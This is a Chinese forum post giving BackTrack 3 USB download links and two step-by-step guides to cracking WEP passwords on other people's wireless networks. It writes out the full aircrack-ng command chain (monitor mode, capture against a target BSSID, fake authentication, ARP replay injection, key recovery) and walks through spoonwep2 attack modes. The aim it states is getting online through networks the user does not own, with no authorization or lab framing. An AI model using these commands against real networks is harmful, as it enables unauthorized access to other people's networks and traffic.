返回列表 下一主题 ›› ‹‹ 上一主题 回复 发帖

BackTrack(BT3) USB版 下载地址与安装说明

BackTrack(BT3) USB版 下载地址与安装说明

BT3 USB版
软件名称:BackTrack3(BT3) Final(无线路由破解工具系统,黑客系统) USB正式英文ISO版
软件大小:777M
下载地址:f1.soft-3h0jae9frd1g.chnxp.com.cn/BACKTRACK3final_usb.rar
backtrack3(BT3) usb版 破解WIFI无线网络密码详细步骤

  一、先开始制作启动U盘:将下载好的 backtrack3(BT3) usb版(下载地址在文章末尾)文件bt3b141207.rar直接解压到U盘(1G以上容量)。把Boot 和BT3两个文件夹放到U盘的根目录,打开BOOT文件夹双击运行" bootinst.bat "批处理文件。U盘里就会多出4个文件." isolinux.boot" "isolinux.cfg" "isolinux.bin " "syslinux.cfg" (如果想要中文截面的BT3的菜单,就在下载BT3中文语言包。)

  二、之后重启 windows 进入BIOS设置,把BIOS里的frist boot device设置为USB-HDD(或者是USB--ZIP)再重启选择从usb启动。系统进入backtrack3 系统。

  三、现在开始破解

  1.在shell窗口中输入 ifconfig 命令 ,出现如下信息:

  lo no wireless extensions.

  eth0 no wireless extensions.

  eth1 IEEE 802.11g ESSID:"" Nickname:""

  Mode:(......)Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

  Retry:off RTS thr:off Fragment thr:off

  Encryption key:off

  Power Management:off

  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

  Tx excessive retries:0 Invalid misc:0 Missed beacon:0

  2.找出你的无线网卡名字,我这里是 eth1.再启动你的网卡为Moniter模式(输入airmon-ng start eth1 11)。再输入 ifconfig 命令 ,返回如下信息:

  lo no wireless extensions.

  eth0 no wireless extensions.

  eth1 IEEE 802.11g ESSID:"" Nickname:""

  Mode:Monitor Frequency:2.452 GHz Access Point: 00:0F:B5:88:AC:82

  Bit Rate:0 kb/s Tx-Power:18 dBm Sensitivity=0/3

  Retry:off RTS thr:off Fragment thr:off

  Encryption key:off

  Power Management:off

  Link Quality=0/94 Signal level=-95 dBm Noise level=-95 dBm

  Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0

  Tx excessive retries:0 Invalid misc:0 Missed beacon:0

  3. 输入命令 airodump-ng -c 11 --bssid 00:1A:01:8D:C3:B2 -w outputs eth1.

  命令中的11 表示要破解的频道号,bssid后面的数字表示破解目标的MAC物理地址,outputs表示要生成的包的名称。回车运行。

  4.再开一个 shell 输入 aireplay-ng -1 0 -e targetnet -a 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1

  其中“targetnet”表示破解目标网络名,00:1A:01:8D:C3:B2前面已解释过是指目标MAC物理地址,00:A1:C1:D8:A5:B6表示本机网卡MAC物理地址

  5.再开一个 shell 输入 aireplay-ng -3 -b 00:1A:01:8D:C3:B2 -h 00:A1:C1:D8:A5:B6 eth1

  获取更多的数据包。

  6.返回数据量到1万的时候就可以破解了。再开一个shell输入 aircrack-ng -z -b 00:1A:01:8D:C3:B2 outputs.cap 进行破解。如果破解不成功,让它继续抓包,直到破解
BT3中文语言包(共有7个分卷,全部需要)
www.gougou.com/search?search=BT3%E4%B8%AD%E6%96%87%E8%AF%AD%E8%A8%80%E5%8C%85&restype=-1&id=10000001&ty=0&pattern=0&xmp=0
Backtrack 3 USB 启动盘参考:(U盘格式化请选用FAT格式)
wenku.baidu.com/view/c006819951e79b8968022675.html
BackTrack3(BT3)破解无线路由密码过程详解(USB无线网卡)

  已经修过两篇用Backtrack3(BT3)破解无线信号密码的教程了,其中一篇是将BT3安装到硬盘的方法;另外一篇是将BT3安装到U盘的方法。但是这两种方法都有一个共同的要求:那就是你的笔记本内置的无线网卡必须支持BT3破解才行,如果不在BT3所支持的无线网卡列表上,那就只能干瞪眼了。

  从目前主流的一些上网本来看,大部分内置的无线网卡都是不支持BT3破解的,所以我们需要想一些别的办法让我们的Netbook支持BT3破解:那就是需要另外购买一个外置的USB接口的无限网卡。

  所以本文即是利用外置的USB无线网卡来破解无线信号的密码。

  首先是在选购USB无线网卡的时候一定要确认是支持BT3破解的才可以,这个在淘宝上购买的话一般商家都知道的,而且很多商家也都在商品的标题上注明了是否支持BT3破解。

  这次我选用的外置USB无线网卡为:萨基姆XG-760N无线网卡 淘宝价格35元左右(当然不是全新的喽)

  这个卡的特点是BT3的支持比较好,在BT3中不用单独安装驱动,而且支持破解。缺点是:信号一般,感觉明显不如1000H自带的Ralink RT2790.

  其实淘宝上可选的能够用于BT3破解的卡还是比较哦多的,完全可以根据自己的情况做出其他的选择。可以选择信号更好的,也可以选择那种自带BT3系统的无线网卡。

  又啰嗦了一番,还是把清单列一下:

  硬件准备:笔记本一台,支持BT3破解的USB无线网卡一个,1G以上U盘或者SD卡一个

  软件准备:(采用之前介绍过的U盘安装法)你需要先准备好以下三款软件:

  a. U盘版的BT3镜像(ISO):http://ftp.heanet.ie/mirrors/backtrack/bt3final_usb.iso

  b. Unetbootin for windows(在win系统中将BT3安装到U盘的工具):http://lubi.sourceforge.net/unetbootin.html

  c. Spoonwep2(BT3中用来破解密码的工具):http://bbs.eeefan.com/thread-19429-1-1.html这个帖子中找一下吧,或者自己百度

  ========《教程》==========

  1. 在Windows XP中,利用Unetbootin工具将BT3安装到U盘,同时将spoonwep工具放到U盘中。

  (1) 准备1G以上的U盘或者SD卡,运行Unetbootin,在界面中图示的两处位置指定磁盘镜像路径,并选择U盘所在盘符,然后点击确定。接下来有个制作的过程,所需时间因U盘而异(U盘较慢的话可能需要一二十分钟),完成后会提示你重启,这时候就已经制作好啦。简单吧,呵呵。

  (2)将你下载的spoonwep2.lzm(注意是LZM扩展名的文件,不要搞成rar的)文件拷贝到U盘下的/BT3/modules/目录中。这样再从U盘启动BT3的时候,BT3可自动加载spoonwep。

  (3)从U盘启动系统(如果是EeePC系列的上网本可在开机时不停的按“esc”键,直至出现驱动设备选择菜单,选择从U盘启动;其他机型可参考)。然后会出现BT3启动选项菜单,选择第五项:BT3 Graphics Mode (VESA KDE)(注意,一定要选择VESA KDE模式,这一步和硬盘安装的bt3是不一样的 )。

  (4)进入BT3图形界面系统后点击屏幕左下角“开始”按钮右侧第一个黑色的小图标,弹出终端命令窗口。

  (5)在konsole窗口中输入:spoonwep然后按回车,等会儿就会弹出一个新窗口即spoonwep2的界面。(在我的机器上出现了error的提示,没管它,好像也没什么影响).

  (6)在sponwep settings 界面中有三个下拉框选项,其中后两个下拉框的选择比较容易:driver选择normal;mode选择unknown victim就可以了,至于第一个Net Card选线框,到底应该选择哪一项 ,其实可以用一个“土办法”来搞定,拔下外置usb无线网卡,看一下Net card下拉框中都有什么选项,然后再插上USB无线网卡,看一下Net card 下拉框中多出了哪一项,那么多出的哪一项即对应你的USB无线网卡。如果是760N在EeePC 1000H上时对应的“ETH0”。

  (7)在victims discovery界面中,左上角的下拉框是选择无线信号频道的搜索模式的(固定FIXED或者全频道Chan Hopping),在这里选择默认的“CHAN HOPPING”全频道模式。点击右上角 LAUNCH 按钮 (点完后会变成 ABORT ) 这时会弹出抓包窗口(SCAN),可作为参考,也可不用理会。稍等一会儿,如果能够找到符合要求的信号,会在当前的victims discovery窗口中显示扫描到的信息,每一行对应一个搜索到的无限信号,具体的意义我已经在图片中标出。尽量选择信号强度POW数值大、DATA数值大、有客户端的来破解。

  用鼠标点击选中你要破解的无线信号,然后在下边会显示这个无线信号对应的客户端,你可以点击选中一个客户端(这样更容易破解一些),也可以不选(不选即使用无客户端模式)。然后点击窗口下边的selection OK按钮,就会进入attack panel界面。

  (8)在attack panel界面,你只需要选择攻击模式,其他的选项处都保持默认即可。攻击模式下拉框中几个选项的区别如下(由客户端建议选择第一项,无客户端建议选择第四项):

  ARP REPLAY ATTACK (有客户端时用)

  P0841 REPLAY ATTACK (第三选择)

  CHOPCHOP & FORGEATTACK (第二选择)

  FRAGMENTATION & FORGE ATTACK(首选)

  到底选择那个攻击模式呢,我的建议是挨个的试试,可以按照上边提示的顺序试。选定攻击模式后直接点击launch即可开始破解,这时同样会在任务栏出现一个新的窗口,你可以用鼠标点击出来看一看,里面会显示一些相关的信息,如信号强度等。注意,最后破解出来的密码是在attack panel界面下方显示(而不是在spoonwep dump窗口显示)。

  一般破解大概需要几分钟既可以破解出来了,20分钟以上破解不出来就直接放弃或者换攻击模式。破解出来的密码是16进制的一个数,每隔两位用冒号隔开,直接把冒号去掉,然后在连接无线信号上网时根据提示按要求输入即可上网了

  如果破解超过20分钟还没有破解出密码来大家就不要继续等了,仔细检查一下有什么地方设置的不对,或者是不是自己的无线网卡不支持注入破解(像1000H的网卡只能监听,无法注入,故无法破解)。

  U盘版BT3能够制作成功的关键在于两点,一是一定要选择U盘版的BT3(不要用光盘版);二是一定要开机选择VESA KDE模式,不要按照默认的。
返回列表 下一主题 ›› ‹‹ 上一主题